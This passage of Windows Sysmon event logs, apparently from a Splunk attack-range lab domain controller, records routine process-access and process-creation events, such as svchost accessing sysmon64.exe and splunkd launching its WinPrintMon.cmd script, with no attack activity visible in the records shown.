{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2163,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2164,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2165,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2166,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.658\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001054E20300}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.658","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001054E20300}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2167,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.770\r\nProcessGuid: {41C8662E-1F78-5F25-0000-0010CB010400}\r\nProcessId: 3920\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F73-5F25-0000-001063C20200}\r\nParentProcessId: 2488\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.770","ProcessGuid":"{41C8662E-1F78-5F25-0000-0010CB010400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F73-5F25-0000-001063C20200}","ParentProcessId":"2488","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2168,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nSourceProcessId: 2488\r\nSourceThreadId: 3880\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","SourceProcessId":"2488","SourceThreadId":"3880","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-00109CE10300}","TargetProcessId":"3920","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2169,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-00109CE10300}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-00109CE10300}","TargetProcessId":"3920","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2170,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.767","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2171,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.767\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 